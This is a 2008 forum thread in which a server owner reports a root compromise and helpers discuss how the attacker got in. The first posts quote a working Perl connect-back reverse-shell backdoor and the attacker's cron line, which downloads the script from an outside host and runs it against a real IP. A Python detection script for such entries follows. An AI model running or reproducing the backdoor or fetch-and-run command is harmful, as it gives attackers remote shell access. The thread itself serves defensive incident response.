Atomic Secure Linux
Post new topic Reply to topic  [ 32 posts ]  Go to page 1, 2, 3  Next
Post subject: Server hacked - unable to log case at Support panel [SOLVED]
Posted: Sat Oct 25, 2008 5:18 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Hi,

My server has been hacked. Rootkit Hunter detects rootkits and it seems like they are using my server for sending spam. ASL hasn't prevented the attack and now I am in desperate need of help. But the support panel https://support.prometheus-group.com/ isn't working. It just gives an error message "There was an error processing your request. Please contact the webmaster. Redirected from: portal.php".

What should I do now? The wiki entry isn't very helpful. It just says look for suspicious files.. I could get everything back to the way it was before it got hacked, but they will probably use the same backdoor to hack it again.

The hacking launched a script with the following content:

Quote:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";


Last edited by biggles on Sat Oct 25, 2008 8:18 am, edited 1 time in total.

Posted: Sat Oct 25, 2008 5:20 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
The script was run from cron:
(root) CMD (cd /tmp ; wget http://flaviu.conf-team.com/d.pl ; perl d.pl 88.191.98.145 23 ; rm -rf d.pl)


Posted: Sat Oct 25, 2008 9:55 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
They have installed something called verlihub. I read on the website that it is some kind of Direct Connect hub. Doesn't sound good....


Posted: Sat Oct 25, 2008 10:40 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
They had changed the login options for the user bin and permitted it to login.


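A defender-side check for the two indicators described so far in this thread: a cron entry that downloads a script and hands it to an interpreter, and a system account such as bin that has been given a login shell. This is an added example, not code from the thread or from ASL; the /etc/passwd lines and cron log lines are constructed, with example.invalid and a TEST-NET address standing in for the real host and IP.

```python
import re

# Constructed sample /etc/passwd (not from the thread): the "bin" account has
# been given an interactive shell, which is what the post above describes.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
admin:x:500:500:Admin:/home/admin:/bin/bash
"""

# Constructed sample syslog lines in the CROND format quoted earlier; the host
# and address are placeholders, not the ones from the thread.
SAMPLE_CRON_LOG = """Oct 25 04:10:01 host CROND[1234]: (root) CMD (run-parts /etc/cron.hourly)
Oct 25 04:15:01 host CROND[1240]: (root) CMD (cd /tmp ; wget http://example.invalid/d.pl ; perl d.pl 192.0.2.10 23 ; rm -rf d.pl)
Oct 25 04:20:01 host CROND[1251]: (admin) CMD (/usr/local/bin/backup.sh)
"""

# Shells that do not allow an interactive login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                  "/bin/sync", "/sbin/halt", "/sbin/shutdown"}

def system_accounts_with_shell(passwd_text, uid_max=499):
    """Names of system accounts (0 < uid <= uid_max) that have a login shell.
    On RHEL4-era systems regular users start at uid 500; root is skipped
    because a shell for uid 0 is expected."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if 0 < uid <= uid_max and shell not in NOLOGIN_SHELLS:
            hits.append(name)
    return hits

# A downloader followed later in the same command by an interpreter.
FETCH_AND_RUN = re.compile(r"\b(wget|curl|fetch|lynx)\b.*\b(perl|sh|bash|python|php)\b")

def suspicious_cron_commands(log_text):
    """(user, command) pairs for CROND lines that fetch something and then run
    an interpreter on it. A download alone is not flagged, so a plain
    wget-based backup job will not match."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"\((\w+)\) CMD \((.*)\)\s*$", line)
        if m and FETCH_AND_RUN.search(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits
```

Run the two functions over the real /etc/passwd and /var/log/cron of a box under investigation; a hit in the first list is worth comparing against a clean system's passwd file before deciding the account was tampered with.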
Posted: Sat Oct 25, 2008 11:01 am
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
You need root access to change login options and it seems they also had root access to add that cron job. They must have exploited some vulnerability to get root access. What OS are you running? All updates applied? Were you running the ASL kernel?

Do you allow root SSH login using a password? Or they may have cracked your Plesk admin password and added the cron job that way (if you haven't explicitly disabled being able to change root's crontab from Plesk).

_________________
Lemonbit Internet Dedicated Server Management


Posted: Sat Oct 25, 2008 11:08 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Yeah, they probably gained root access. The server is RH EL4 running in a hosted VZ-container. So I am not able to run the ASL-kernel.

Everything is updated with yum and ASL.

Root login is not permitted. It is unlikely they have done the change through the Plesk-interface. The password is long and contains special characters.

It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS. Now I don't really know. My ASL subscription seems kinda wasted money...


Posted: Sat Oct 25, 2008 11:21 am
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
biggles wrote:
It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS.


Exploiting security holes in a CMS doesn't get you root access. Something more serious happened in this case.

_________________
Lemonbit Internet Dedicated Server Management


Posted: Sat Oct 25, 2008 11:30 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
OK. Good to hear that at least!

I have key-based SSH-login to the server and I cannot imagine how they could hack the Plesk password...


Posted: Sat Oct 25, 2008 1:20 pm
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7780
Location: earth
They could have gotten in through another guest host, or by compromising the main server itself. Or even your desktop. The best thing to do at this point would be to secure /var/ossec/logs/ to another box for analysis.


Posted: Sat Oct 25, 2008 1:52 pm
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Logs secured!


Posted: Sat Oct 25, 2008 4:18 pm
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
I am having a very good discussion with support now. The only problem is that my hosting company insists that this is a PHP backdoor that has been used and they are not willing to cooperate at all...


Posted: Mon Oct 27, 2008 5:54 pm
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 2007
Please let us know the outcome. It isn't nice when this happens to anyone.

_________________
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>


Posted: Mon Oct 27, 2008 5:58 pm
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
Unfortunately there isn't any nice outcome. I still haven't the faintest idea why this happens and I don't have any idea how to stop it. They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it definitely could happen with just a faulty script. I don't really know where to look...


Posted: Mon Oct 27, 2008 8:45 pm
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
biggles wrote:
They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it defiantly could happen with just a faulty script.


Your webserver and scripts don't run as root. An exploitable script can let an attacker run code, but it won't give him root access directly. To get to root, the attacker must have exploited something else to escalate privileges. Being able to run code in the first place helps of course, so a vulnerable script may have been the initial attack vector. I remember the vmsplice local root exploit from February this year, but if the server is running an up-to-date kernel (is it?), the attacker can't have used that one.

_________________
Lemonbit Internet Dedicated Server Management


Posted: Tue Oct 28, 2008 5:23 am
Forum Regular

Joined: Tue Jul 15, 2008 2:38 pm
Posts: 762
Location: Sweden
I really don't know. I am just renting a few servers based on RH EL4 with Plesk 8.3 which is running in Virtuozzo containers.

